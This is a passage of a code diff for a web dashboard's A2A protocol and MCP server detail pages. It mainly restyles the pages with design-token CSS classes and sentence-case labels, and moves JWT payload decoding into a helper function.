-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Duration</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Created</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Task ID</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Client → Remote</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Skill</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">State</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Messages</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Duration</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Created</th>
               </tr>
             </thead>
-            <tbody className="divide-y divide-gray-200 dark:divide-gray-700">
+            <tbody className="divide-y divide-divider">
               {filteredTasks.map((task) => (
-                <tr key={task.id} className="hover:bg-gray-50 dark:hover:bg-gray-800/50">
+                <tr key={task.id} className="hover:bg-glass-inset-gray">
                   <td className="px-4 py-3">
-                    <span className="text-sm font-mono text-gray-900 dark:text-gray-100">{task.externalTaskId || task.id.slice(0, 8)}</span>
+                    <span className="text-sm font-mono text-ink">{task.externalTaskId || task.id.slice(0, 8)}</span>
                   </td>
                   <td className="px-4 py-3">
                     <div className="flex items-center gap-1 text-sm">
-                      <span className="text-gray-900 dark:text-gray-100">{task.clientAgentName || task.clientAgentId?.slice(0, 8) || "—"}</span>
-                      <ArrowLeftRight className="h-3 w-3 text-gray-400" />
-                      <span className="text-gray-900 dark:text-gray-100">{task.remoteAgentName || task.remoteAgentId?.slice(0, 8) || "—"}</span>
+                      <span className="text-ink">{task.clientAgentName || task.clientAgentId?.slice(0, 8) || "—"}</span>
+                      <ArrowLeftRight className="h-3 w-3 text-ink-tertiary" />
+                      <span className="text-ink">{task.remoteAgentName || task.remoteAgentId?.slice(0, 8) || "—"}</span>
                     </div>
                   </td>
                   <td className="px-4 py-3">
-                    <span className="text-sm text-gray-600 dark:text-gray-400">{task.skillId || "—"}</span>
+                    <span className="text-sm text-ink-body">{task.skillId || "—"}</span>
                   </td>
                   <td className="px-4 py-3">
                     <StatusBadge status={task.state} />
                   </td>
                   <td className="px-4 py-3">
-                    <span className="text-sm text-gray-900 dark:text-gray-100">{task.messageCount || 0}</span>
+                    <span className="text-sm text-ink">{task.messageCount || 0}</span>
                   </td>
                   <td className="px-4 py-3">
-                    <span className="text-sm text-gray-500 dark:text-gray-400">
+                    <span className="text-sm text-ink-secondary">
                       {task.durationMs ? `${task.durationMs}ms` : "—"}
                     </span>
                   </td>
                   <td className="px-4 py-3">
-                    <span className="text-sm text-gray-500 dark:text-gray-400">
+                    <span className="text-sm text-ink-secondary">
                       {task.createdAt ? formatRelativeTime(task.createdAt) : "—"}
                     </span>
                   </td>
@@ -806,52 +817,52 @@ function TrustTab({ trustScores, agentCards, loading }: {
       {/* Summary stats */}
       <div className="grid grid-cols-2 sm:grid-cols-4 gap-4">
         {[
-          { label: "Agents Scored", value: trustScores.length, icon: Bot },
-          { label: "Avg Trust Score", value: trustScores.length > 0
+          { label: "Agents scored", value: trustScores.length, icon: Bot },
+          { label: "Avg trust score", value: trustScores.length > 0
             ? `${(trustScores.reduce((a, s) => a + (s.a2aTrustScore || 0), 0) / trustScores.length * 100).toFixed(0)}%`
             : "N/A", icon: Shield },
-          { label: "Total Tasks", value: trustScores.reduce((a, s) => a + s.totalTasksAsClient + s.totalTasksAsRemote, 0), icon: Activity },
-          { label: "Total Peers", value: trustScores.reduce((a, s) => a + s.uniquePeersCount, 0), icon: Users },
+          { label: "Total tasks", value: trustScores.reduce((a, s) => a + s.totalTasksAsClient + s.totalTasksAsRemote, 0), icon: Activity },
+          { label: "Total peers", value: trustScores.reduce((a, s) => a + s.uniquePeersCount, 0), icon: Users },
         ].map(s => (
           <StatCard key={s.label} stat={{ name: s.label, value: s.value, icon: s.icon }} />
         ))}
       </div>
 
       {/* Agent Trust Scores Table */}
-      <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 overflow-hidden">
-        <div className="px-6 py-4 border-b border-gray-200 dark:border-gray-700">
-          <h3 className="text-lg font-medium text-gray-900 dark:text-gray-100">Agent A2A Trust Scores</h3>
+      <div className="glass overflow-hidden">
+        <div className="px-6 py-4 border-b border-divider">
+          <h3 className="text-lg font-medium text-ink">Agent A2A trust scores</h3>
         </div>
         <div className="overflow-x-auto">
-          <table className="min-w-full divide-y divide-gray-200 dark:divide-gray-700">
-            <thead className="bg-gray-50 dark:bg-gray-800">
+          <table className="min-w-full divide-y divide-divider">
+            <thead className="bg-glass-inset-gray">
               <tr>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Agent</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Trust Score</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Tasks (Client)</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Tasks (Remote)</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Completed</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Failed</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Unique Peers</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Agent</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Trust score</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Tasks (client)</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Tasks (remote)</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Completed</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Failed</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Unique peers</th>
               </tr>
             </thead>
-            <tbody className="divide-y divide-gray-200 dark:divide-gray-700">
+            <tbody className="divide-y divide-divider">
               {enrichedScores.map((score) => (
-                <tr key={score.agentId} className="hover:bg-gray-50 dark:hover:bg-gray-800/50">
+                <tr key={score.agentId} className="hover:bg-glass-inset-gray">
                   <td className="px-4 py-3">
                     <div className="flex items-center gap-2">
-                      <Bot className="h-4 w-4 text-blue-500" />
-                      <span className="text-sm font-medium text-gray-900 dark:text-gray-100">{score.agentName}</span>
+                      <Bot className="h-4 w-4 text-brand-text" />
+                      <span className="text-sm font-medium text-ink">{score.agentName}</span>
                     </div>
                   </td>
                   <td className="px-4 py-3">
                     <TrustScoreBadge score={score.a2aTrustScore || 0} />
                   </td>
-                  <td className="px-4 py-3 text-sm text-gray-900 dark:text-gray-100">{score.totalTasksAsClient}</td>
-                  <td className="px-4 py-3 text-sm text-gray-900 dark:text-gray-100">{score.totalTasksAsRemote}</td>
-                  <td className="px-4 py-3 text-sm text-green-600">{score.tasksCompleted}</td>
-                  <td className="px-4 py-3 text-sm text-red-600">{score.tasksFailed}</td>
-                  <td className="px-4 py-3 text-sm text-gray-900 dark:text-gray-100">{score.uniquePeersCount}</td>
+                  <td className="px-4 py-3 text-sm text-ink">{score.totalTasksAsClient}</td>
+                  <td className="px-4 py-3 text-sm text-ink">{score.totalTasksAsRemote}</td>
+                  <td className="px-4 py-3 text-sm text-success-text">{score.tasksCompleted}</td>
+                  <td className="px-4 py-3 text-sm text-danger-text">{score.tasksFailed}</td>
+                  <td className="px-4 py-3 text-sm text-ink">{score.uniquePeersCount}</td>
                 </tr>
               ))}
             </tbody>
@@ -897,45 +908,45 @@ function SkillsTab({ agentCards, loading }: { agentCards: A2AAgentCard[]; loadin
     <div className="space-y-4">
       {/* Search */}
       <div className="relative">
-        <Search className="absolute left-3 top-1/2 transform -translate-y-1/2 h-4 w-4 text-gray-400" />
+        <Search className="absolute left-3 top-1/2 transform -translate-y-1/2 h-4 w-4 text-ink-tertiary" />
         <input
           type="text"
           placeholder="Search skills by name, description, or tags..."
           value={searchQuery}
           onChange={(e) => setSearchQuery(e.target.value)}
-          className="w-full pl-10 pr-4 py-3 border border-gray-300 dark:border-gray-600 rounded-lg bg-white dark:bg-gray-900 text-gray-900 dark:text-gray-100 focus:ring-2 focus:ring-blue-500"
+          className="w-full pl-10 pr-4 py-3 border border-stroke rounded-inset bg-glass-inset text-ink placeholder:text-ink-tertiary focus:outline-none focus:ring-2 focus:ring-ring"
         />
       </div>
 
       {/* Skills Grid */}
       <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-4">
         {skills.map((skill, idx) => (
-          <div key={`${skill.id}-${idx}`} className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-4 hover:shadow-md transition-shadow">
+          <div key={`${skill.id}-${idx}`} className="glass p-4 transition-shadow hover:shadow-chrome">
             <div className="flex items-start justify-between">
               <div className="flex items-center gap-2">
-                <div className="h-8 w-8 bg-purple-100 dark:bg-purple-900/30 rounded-lg flex items-center justify-center">
-                  <Zap className="h-4 w-4 text-purple-600 dark:text-purple-400" />
+                <div className="h-8 w-8 bg-brand-soft rounded-inset-sm flex items-center justify-center">
+                  <Zap className="h-4 w-4 text-brand-text" />
                 </div>
                 <div>
-                  <h4 className="text-sm font-medium text-gray-900 dark:text-gray-100">{skill.name}</h4>
-                  <p className="text-xs text-gray-500 dark:text-gray-400">by {skill.agentName}</p>
+                  <h4 className="text-sm font-medium text-ink">{skill.name}</h4>
+                  <p className="text-xs text-ink-tertiary">by {skill.agentName}</p>
                 </div>
               </div>
             </div>
-            <p className="mt-3 text-sm text-gray-600 dark:text-gray-400 line-clamp-2">
+            <p className="mt-3 text-sm text-ink-body line-clamp-2">
               {skill.description || "No description available"}
             </p>
             {skill.tags && skill.tags.length > 0 && (
               <div className="mt-3 flex flex-wrap gap-1">
                 {skill.tags.slice(0, 3).map((tag) => (
-                  <span key={tag} className="px-2 py-0.5 bg-gray-100 dark:bg-gray-700 rounded text-xs text-gray-600 dark:text-gray-400">
+                  <span key={tag} className="px-2 py-0.5 bg-glass-inset-gray rounded text-xs text-ink-body">
                     {tag}
                   </span>
                 ))}
               </div>
             )}
             {skill.inputModes && (
-              <div className="mt-3 flex items-center gap-2 text-xs text-gray-500 dark:text-gray-400">
+              <div className="mt-3 flex items-center gap-2 text-xs text-ink-secondary">
                 <span>Input: {skill.inputModes.join(", ")}</span>
               </div>
             )}
@@ -1071,18 +1082,18 @@ export default function A2AProtocolPage() {
         {/* Header */}
         <div className="flex items-center justify-between">
           <div>
-            <h1 className="text-2xl font-bold text-gray-900 dark:text-white flex items-center gap-3">
-              <Network className="h-7 w-7 text-blue-600" />
-              A2A Protocol
+            <h1 className="text-2xl font-bold text-ink flex items-center gap-3">
+              <Network className="h-7 w-7 text-brand-text" />
+              A2A protocol
             </h1>
-            <p className="mt-1 text-sm text-gray-500 dark:text-gray-400">
+            <p className="mt-1 text-sm text-ink-secondary">
               Secure agent-to-agent communication with AIM attestation and trust scoring
             </p>
           </div>
           <div className="flex items-center gap-3">
             <button
               onClick={fetchData}
-              className="flex items-center gap-2 px-4 py-2 text-gray-600 dark:text-gray-300 border border-gray-300 dark:border-gray-600 rounded-lg hover:bg-gray-50 dark:hover:bg-gray-800 transition-colors"
+              className="flex items-center gap-2 px-4 py-2 text-sm font-semibold text-ink-body border border-stroke rounded-pill transition-colors hover:bg-glass-inset-gray"
             >
               <RefreshCw className="h-4 w-4" />
               Refresh
@@ -1091,16 +1102,16 @@ export default function A2AProtocolPage() {
               href="https://google.github.io/A2A/"
               target="_blank"
               rel="noopener noreferrer"
-              className="flex items-center gap-2 px-4 py-2 bg-blue-600 text-white rounded-lg hover:bg-blue-700 transition-colors"
+              className={buttonVariants()}
             >
               <ExternalLink className="h-4 w-4" />
-              A2A Spec
+              A2A spec
             </a>
           </div>
         </div>
 
         {/* Tabs */}
-        <div className="border-b border-gray-200 dark:border-gray-700">
+        <div className="border-b border-divider">
           <nav className="flex space-x-8 overflow-x-auto" aria-label="Tabs">
             {TABS.map((tab) => (
               <button
@@ -1108,8 +1119,8 @@ export default function A2AProtocolPage() {
                 onClick={() => setActiveTab(tab.id)}
                 className={`flex items-center gap-2 py-4 px-1 border-b-2 font-medium text-sm whitespace-nowrap transition-colors ${
                   activeTab === tab.id
-                    ? "border-blue-500 text-blue-600 dark:text-blue-400"
-                    : "border-transparent text-gray-500 dark:text-gray-400 hover:text-gray-700 dark:hover:text-gray-300 hover:border-gray-300"
+                    ? "border-brand text-brand-text"
+                    : "border-transparent text-ink-secondary hover:text-ink hover:border-stroke"
                 }`}
               >
                 <tab.icon className="h-4 w-4" />
@@ -1127,7 +1138,7 @@ export default function A2AProtocolPage() {
         {/* Delete Confirmation */}
         <ConfirmDialog
           isOpen={showDeleteConfirm}
-          title="Delete Agent Card"
+          title="Delete agent card"
           message={`Are you sure you want to delete the agent card for "${deleteTarget?.name}"? This action cannot be undone.`}
           confirmText="Delete"
           cancelText="Cancel"

--- a/apps/web/app/dashboard/mcp/[id]/page.tsx
+++ b/apps/web/app/dashboard/mcp/[id]/page.tsx
@@ -1,6 +1,7 @@
 "use client";
 
 import { useState, useEffect } from "react";
+import { decodeJwtPayload } from "@/lib/jwt-payload";
 import { useRouter } from "next/navigation";
 import {
   ArrowLeft,
@@ -24,7 +25,7 @@ import {
   FileText,
   Clock,
 } from "lucide-react";
-import { Button } from "@/components/ui/button";
+import { Button, buttonVariants } from "@/components/ui/button";
 import {
   Card,
   CardContent,
@@ -160,7 +161,8 @@ export default function MCPServerDetailsPage({
     const token = api.getToken?.();
     if (!token) return;
     try {
-      const payload = JSON.parse(atob(token.split(".")[1]));
+      const payload = decodeJwtPayload(token);
+      if (!payload) throw new Error("token payload is not decodable");
       const role = (payload.role as any) || "viewer";
       setUserRole(role);
     } catch {}
@@ -331,17 +333,17 @@ export default function MCPServerDetailsPage({
 
   // Get trust score color
   const getTrustColor = (score: number): string => {
-    if (score >= 80) return "text-green-600 bg-green-500/10";
-    if (score >= 60) return "text-yellow-600 bg-yellow-500/10";
-    return "text-red-600 bg-red-500/10";
+    if (score >= 80) return "text-success-text bg-success-fill border-success-border";
+    if (score >= 60) return "text-warning-text bg-warning-fill border-warning-border";
+    return "text-danger-text bg-danger-fill border-danger-border";
   };
 
   // Get confidence score color (for agent attestation)
   const getConfidenceColor = (score: number): string => {
-    if (score >= 80) return "text-green-600 bg-green-500/10";
-    if (score >= 60) return "text-yellow-600 bg-yellow-500/10";
-    if (score >= 40) return "text-orange-600 bg-orange-500/10";
-    return "text-red-600 bg-red-500/10";
+    if (score >= 80) return "text-success-text bg-success-fill border-success-border";
+    if (score >= 60) return "text-warning-text bg-warning-fill border-warning-border";
+    if (score >= 40) return "text-warning-text bg-warning-fill border-warning-border";
+    return "text-danger-text bg-danger-fill border-danger-border";
   };
 
   // Get status color
@@ -349,13 +351,13 @@ export default function MCPServerDetailsPage({
     switch (status) {
       case "active":
       case "verified":
-        return "bg-green-500/10 text-green-600";
+        return "bg-success-fill text-success-text border-success-border";
       case "pending":
-        return "bg-yellow-500/10 text-yellow-600";
+        return "bg-warning-fill text-warning-text border-warning-border";
       case "inactive":
-        return "bg-gray-500/10 text-gray-600";
+        return "bg-glass-inset-gray text-ink-body border-glass-inset-border";
       default:
-        return "bg-gray-500/10 text-gray-600";
+        return "bg-glass-inset-gray text-ink-body border-glass-inset-border";
     }
   };
 
@@ -373,13 +375,13 @@ export default function MCPServerDetailsPage({
       <div className="flex items-center justify-center min-h-[400px]">
         <Card className="max-w-md">
           <CardHeader>
-            <CardTitle className="flex items-center gap-2 text-destructive">
+            <CardTitle className="flex items-center gap-2 text-danger-text">
               <AlertTriangle className="h-5 w-5" />
-              Error Loading MCP Server
+              Error loading MCP server
             </CardTitle>
           </CardHeader>
           <CardContent>
-            <p className="text-muted-foreground mb-4">
+            <p className="text-ink-secondary mb-4">
               {error ||
                 "MCP server not found or you do not have permission to view it."}
             </p>
@@ -388,7 +390,7 @@ export default function MCPServerDetailsPage({
               onClick={() => router.push("/dashboard/mcp")}
             >
               <ArrowLeft className="mr-2 h-4 w-4" />
-              Back to MCP Servers
+              Back to MCP servers
             </Button>
           </CardContent>
         </Card>
@@ -408,25 +410,25 @@ export default function MCPServerDetailsPage({
             className="mb-4"
           >
             <ArrowLeft className="mr-2 h-4 w-4" />
-            Back to MCP Servers
+            Back to MCP servers
           </Button>
 
           <div className="flex items-start justify-between gap-4">
             <div className="flex items-start gap-4">
-              <div className="flex h-16 w-16 items-center justify-center rounded-xl bg-purple-500/10">
-                <Server className="h-8 w-8 text-purple-600" />
+              <div className="flex h-16 w-16 items-center justify-center rounded-inset bg-brand-soft">
+                <Server className="h-8 w-8 text-brand-text" />
               </div>
               <div>
                 <div className="flex items-center gap-2 mb-1">
                   <h1 className="text-3xl font-bold">{server.name}</h1>
                   {isVerified && (
                     <span title="Verified">
-                      <Shield className="h-6 w-6 text-green-600" />
+                      <Shield className="h-6 w-6 text-success-text" />
                     </span>
                   )}
                 </div>
                 {server.description && (
-                  <p className="text-muted-foreground mb-2">
+                  <p className="text-ink-secondary mb-2">
                     {server.description}
                   </p>
                 )}
@@ -465,7 +467,6 @@ export default function MCPServerDetailsPage({
                 <Button
                   onClick={handleVerify}
                   disabled={verifying}
-                  className="bg-green-600 hover:bg-green-700"
                 >
                   {verifying ? (
                     <>
@@ -503,16 +504,16 @@ export default function MCPServerDetailsPage({
 
         {/* HERO: Confidence Score Card */}
         {server.verificationMethod === "agent_attestation" ? (
-          <Card className="border-blue-200 dark:border-blue-700">
+          <Card className="border-brand-soft">
             <CardHeader className="pb-3">
               <div className="flex items-center justify-between">
                 <div className="flex items-center gap-4">
-                  <div className="flex h-10 w-10 items-center justify-center rounded-lg bg-blue-500/10">
-                    <Shield className="h-6 w-6 text-blue-600 dark:text-blue-400" />
+                  <div className="flex h-10 w-10 items-center justify-center rounded-lg bg-brand-soft">
+                    <Shield className="h-6 w-6 text-brand-text" />
                   </div>
                   <div>
                     <CardTitle className="text-lg font-semibold">
-                      Confidence Score
+                      Confidence score
                     </CardTitle>
                     <CardDescription className="text-sm">
                       Verified by {server.attestationCount || 0} agent attestation
@@ -528,7 +529,7 @@ export default function MCPServerDetailsPage({
                   >
                     {(server.confidenceScore ?? 0).toFixed(1)}%
                   </div>
-                  <p className="text-sm text-muted-foreground">
+                  <p className="text-sm text-ink-secondary">
                     {(server.attestationCount ?? 0) === 0
                       ? "No attestations yet"
                       : (server.confidenceScore ?? 0) >= 80
@@ -543,7 +544,7 @@ export default function MCPServerDetailsPage({
               </div>
             </CardHeader>
             <CardContent className="pt-0">
-              <div className="flex items-center gap-4 text-sm text-muted-foreground">
+              <div className="flex items-center gap-4 text-sm text-ink-secondary">
                 <div className="flex items-center gap-1.5">
                   <CheckCircle className="h-4 w-4" />
                   <span>
@@ -577,7 +578,7 @@ export default function MCPServerDetailsPage({
                       ) : (
                         <>
                           <CheckCircle className="h-3 w-3 mr-1.5" />
-                          Request Verification
+                          Request verification
                         </>
                       )}
                     </Button>
@@ -592,7 +593,7 @@ export default function MCPServerDetailsPage({
               <div className="flex items-center justify-between">
                 <div>
                   <CardTitle className="text-lg font-semibold">
-                    Trust Score
+                    Trust score
                   </CardTitle>
                   <CardDescription className="text-sm">
                     Traditional verification method
@@ -606,7 +607,7 @@ export default function MCPServerDetailsPage({
                   >
                     {trustScorePercent(server.trustScore).toFixed(1)}%
                   </div>
-                  <p className="text-sm text-muted-foreground">
+                  <p className="text-sm text-ink-secondary">
                     {trustScorePercent(server.trustScore) >= 80
                       ? "High trust"
                       : trustScorePercent(server.trustScore) >= 60
@@ -638,13 +639,13 @@ export default function MCPServerDetailsPage({
         <div className="grid gap-4 md:grid-cols-4">
           <Card>
             <CardHeader className="pb-3">
-              <CardTitle className="text-sm font-medium text-muted-foreground">
-                Connected Agents
+              <CardTitle className="text-sm font-medium text-ink-secondary">
+                Connected agents
               </CardTitle>
             </CardHeader>
             <CardContent>
               <div className="text-2xl font-bold">{connectedAgents.length}</div>
-              <p className="text-xs text-muted-foreground mt-1">
+              <p className="text-xs text-ink-secondary mt-1">
                 Agent{connectedAgents.length !== 1 ? "s" : ""} using this server
               </p>
             </CardContent>
@@ -652,13 +653,13 @@ export default function MCPServerDetailsPage({
 
           <Card>
             <CardHeader className="pb-3">
-              <CardTitle className="text-sm font-medium text-muted-foreground">
+              <CardTitle className="text-sm font-medium text-ink-secondary">
                 Capabilities
               </CardTitle>
             </CardHeader>
             <CardContent>
               <div className="text-2xl font-bold">{capabilities.length}</div>
-              <p className="text-xs text-muted-foreground mt-1">
+              <p className="text-xs text-ink-secondary mt-1">
                 Tool{capabilities.length !== 1 ? "s" : ""} and resource
                 {capabilities.length !== 1 ? "s" : ""}
               </p>
@@ -667,13 +668,13 @@ export default function MCPServerDetailsPage({
 
           <Card>
             <CardHeader className="pb-3">
-              <CardTitle className="text-sm font-medium text-muted-foreground">
+              <CardTitle className="text-sm font-medium text-ink-secondary">
                 Attestations
               </CardTitle>
             </CardHeader>
             <CardContent>
               <div className="text-2xl font-bold">{attestations.length}</div>
-              <p className="text-xs text-muted-foreground mt-1">
+              <p className="text-xs text-ink-secondary mt-1">
                 Cryptographic verification{attestations.length !== 1 ? "s" : ""}
               </p>
             </CardContent>
@@ -681,7 +682,7 @@ export default function MCPServerDetailsPage({
 
           <Card>
             <CardHeader className="pb-3">
-              <CardTitle className="text-sm font-medium text-muted-foreground">
+              <CardTitle className="text-sm font-medium text-ink-secondary">
                 Status
               </CardTitle>
             </CardHeader>
@@ -689,11 +690,11 @@ export default function MCPServerDetailsPage({
               <Badge className={getStatusColor(server.status)}>
                 {server.status.charAt(0).toUpperCase() + server.status.slice(1)}
               </Badge>
-              <p className="text-xs text-muted-foreground mt-2">
+              <p className="text-xs text-ink-secondary mt-2">
                 {server.lastVerifiedAt
                   ? `Verified ${new Date(server.lastVerifiedAt).toLocaleDateString()}`
                   : server.status === "verified"
-                  ? "Via Attestation"
+                  ? "Via attestation"
                   : "Not yet verified"}
               </p>
             </CardContent>
@@ -708,7 +709,7 @@ export default function MCPServerDetailsPage({
               <ExternalLink className="h-4 w-4 mr-2" />
               Capabilities
             </TabsTrigger>
-            <TabsTrigger value="agents">Connected Agents</TabsTrigger>
+            <TabsTrigger value="agents">Connected agents</TabsTrigger>
             <TabsTrigger value="activity">
               <Activity className="h-4 w-4 mr-2" />
               Attestations
@@ -719,7 +720,7 @@ export default function MCPServerDetailsPage({
             </TabsTrigger>
             <TabsTrigger value="audit">
               <Activity className="h-4 w-4 mr-2" />
-              Audit Trail
+              Audit trail
             </TabsTrigger>
             <TabsTrigger value="integration">
               <Code2 className="h-4 w-4 mr-2" />
@@ -730,7 +731,7 @@ export default function MCPServerDetailsPage({
           <TabsContent value="capabilities" className="space-y-4">
             <Card>
               <CardHeader>
-                <CardTitle>MCP Server Capabilities</CardTitle>
+                <CardTitle>MCP server capabilities</CardTitle>
                 <CardDescription>
                   Capability types supported by this MCP server
                 </CardDescription>
@@ -738,25 +739,25 @@ export default function MCPServerDetailsPage({
               <CardContent>
                 {capabilities.length === 0 ? (
                   <div className="text-center py-8 space-y-4">
-                    <p className="text-muted-foreground">
+                    <p className="text-ink-secondary">
                       No capabilities detected yet
                     </p>
                     <div className="max-w-md mx-auto space-y-3">
-                      <div className="bg-muted/50 rounded-md p-3 text-left">
+                      <div className="bg-glass-inset-gray rounded-md p-3 text-left">
                         <p className="font-medium text-sm mb-1">Option 1: Auto-detect via SDK</p>
-                        <p className="text-xs text-muted-foreground">
+                        <p className="text-xs text-ink-secondary">
                           When an agent attests to this MCP server, capabilities are automatically detected.
                         </p>
                       </div>
-                      <div className="bg-muted/50 rounded-md p-3 text-left">
+                      <div className="bg-glass-inset-gray rounded-md p-3 text-left">
                         <p className="font-medium text-sm mb-1">Option 2: Manual verification</p>
-                        <p className="text-xs text-muted-foreground">
+                        <p className="text-xs text-ink-secondary">
                           Click "Verify" above to query the MCP server directly.
                         </p>
                       </div>
                     </div>
-                    <p className="text-xs text-muted-foreground mt-2">
-                      See the <a href="https://opena2a.org/docs/integration/python" className="underline hover:text-foreground">SDK documentation</a> for more details.
+                    <p className="text-xs text-ink-secondary mt-2">
+                      See the <a href="https://opena2a.org/docs/integration/python" className="underline hover:text-ink">SDK documentation</a> for more details.
                     </p>
                   </div>
                 ) : (
@@ -768,7 +769,7 @@ export default function MCPServerDetailsPage({
 
                       return (
                         <div key={type} className="space-y-2">
-                          <h4 className="text-sm font-semibold text-gray-700 dark:text-gray-300 capitalize flex items-center gap-2">
+                          <h4 className="text-sm font-semibold text-ink-body capitalize flex items-center gap-2">
                             <CheckCircle className="h-4 w-4" />
                             {type}s ({typeCaps.length})
                           </h4>
@@ -776,15 +777,15 @@ export default function MCPServerDetailsPage({
                             {typeCaps.map((capability) => (
                               <div
                                 key={capability.id}
-                                className="p-3 bg-gray-50 dark:bg-gray-800 border border-gray-200 dark:border-gray-700 rounded-md"
+                                className="p-3 bg-glass-inset-gray border border-glass-inset-border rounded-md"
                               >
                                 <div className="flex items-start justify-between gap-2">
                                   <div className="flex-1 min-w-0">
-                                    <p className="text-sm font-medium text-gray-900 dark:text-gray-100">
+                                    <p className="text-sm font-medium text-ink">
                                       {capability.name}
                                     </p>
                                     {capability.description && (
-                                      <p className="text-xs text-gray-600 dark:text-gray-400 mt-0.5">
+                                      <p className="text-xs text-ink-secondary mt-0.5">
                                         {capability.description}
                                       </p>
                                     )}
@@ -811,7 +812,7 @@ export default function MCPServerDetailsPage({
           <TabsContent value="agents" className="space-y-4">
             <Card>
               <CardHeader>
-                <CardTitle>Connected Agents</CardTitle>
+                <CardTitle>Connected agents</CardTitle>
                 <CardDescription>
                   Agents that can communicate with this MCP server
                 </CardDescription>
@@ -819,11 +820,11 @@ export default function MCPServerDetailsPage({
               <CardContent>
                 {agentsError ? (
                   <div className="text-center py-8">
-                    <AlertTriangle className="h-8 w-8 text-destructive mx-auto mb-2" />
-                    <p className="text-destructive font-medium">
+                    <AlertTriangle className="h-8 w-8 text-danger-text mx-auto mb-2" />
+                    <p className="text-danger-text font-medium">
                       Failed to load connected agents
                     </p>
-                    <p className="text-sm text-muted-foreground mt-1">
+                    <p className="text-sm text-ink-secondary mt-1">
                       {agentsError}
                     </p>
                     <Button
@@ -832,16 +833,16 @@ export default function MCPServerDetailsPage({
                       className="mt-4"
                       onClick={handleRefresh}
                     >
-                      Try Again
+                      Try again
                     </Button>
                   </div>
                 ) : connectedAgents.length === 0 ? (
                   <div className="text-center py-8">
-                    <Bot className="h-8 w-8 text-muted-foreground mx-auto mb-2" />
-                    <p className="text-muted-foreground">
+                    <Bot className="h-8 w-8 text-ink-secondary mx-auto mb-2" />
+                    <p className="text-ink-secondary">
                       No agents connected yet
                     </p>
-                    <p className="text-sm text-muted-foreground mt-1">
+                    <p className="text-sm text-ink-secondary mt-1">
                       Agents that attest to this MCP server will appear here
                     </p>
                   </div>
@@ -850,19 +851,19 @@ export default function MCPServerDetailsPage({
                     {connectedAgents.map((agent) => (
                       <div
                         key={agent.id}
-                        className="flex items-center gap-3 p-3 border rounded-lg hover:bg-accent/50 transition-colors cursor-pointer"
+                        className="flex items-center gap-3 p-3 border border-divider rounded-lg hover:bg-glass-inset-gray transition-colors cursor-pointer"
                         onClick={() =>
                           router.push(`/dashboard/agents/${agent.id}`)
                         }
                       >
-                        <div className="flex h-10 w-10 items-center justify-center rounded-lg bg-blue-500/10">
-                          <Bot className="h-5 w-5 text-blue-600" />
+                        <div className="flex h-10 w-10 items-center justify-center rounded-lg bg-brand-soft">
+                          <Bot className="h-5 w-5 text-brand-text" />
                         </div>
                         <div className="flex-1">
                           <h4 className="font-medium">
                             {agent.displayName || agent.name}
                           </h4>
-                          <p className="text-sm text-muted-foreground">
+                          <p className="text-sm text-ink-secondary">
                             {agent.agentType}
                           </p>
                         </div>
@@ -879,7 +880,7 @@ export default function MCPServerDetailsPage({
                             {agent.status}
                           </Badge>
                         )}
-                        <ExternalLink className="h-4 w-4 text-muted-foreground" />
+                        <ExternalLink className="h-4 w-4 text-ink-secondary" />
                       </div>
                     ))}
                   </div>
@@ -901,13 +902,13 @@ export default function MCPServerDetailsPage({
                   <div className="py-6">
                     {/* Header */}
                     <div className="text-center mb-6">
-                      <div className="inline-flex items-center justify-center w-12 h-12 rounded-full bg-blue-100 dark:bg-blue-900/30 mb-3">
-                        <Shield className="h-6 w-6 text-blue-600 dark:text-blue-400" />
+                      <div className="inline-flex items-center justify-center w-12 h-12 rounded-full bg-brand-soft mb-3">
+                        <Shield className="h-6 w-6 text-brand-text" />
                       </div>
-                      <h3 className="text-lg font-semibold text-foreground">
+                      <h3 className="text-lg font-semibold text-ink">
                         No attestations yet
                       </h3>
-                      <p className="text-sm text-muted-foreground mt-1 max-w-sm mx-auto">
+                      <p className="text-sm text-ink-secondary mt-1 max-w-sm mx-auto">
                         Build trust by having agents verify this MCP server
                       </p>
                     </div>
@@ -916,23 +917,23 @@ export default function MCPServerDetailsPage({
                     <div className="grid md:grid-cols-2 gap-4 max-w-2xl mx-auto">
                       {/* Option 1: SDK */}
                       <div className="relative group">
-                        <div className="absolute -inset-0.5 bg-gradient-to-r from-blue-500 to-purple-500 rounded-lg opacity-20 group-hover:opacity-30 transition" />
-                        <div className="relative bg-card border rounded-lg p-4 h-full">
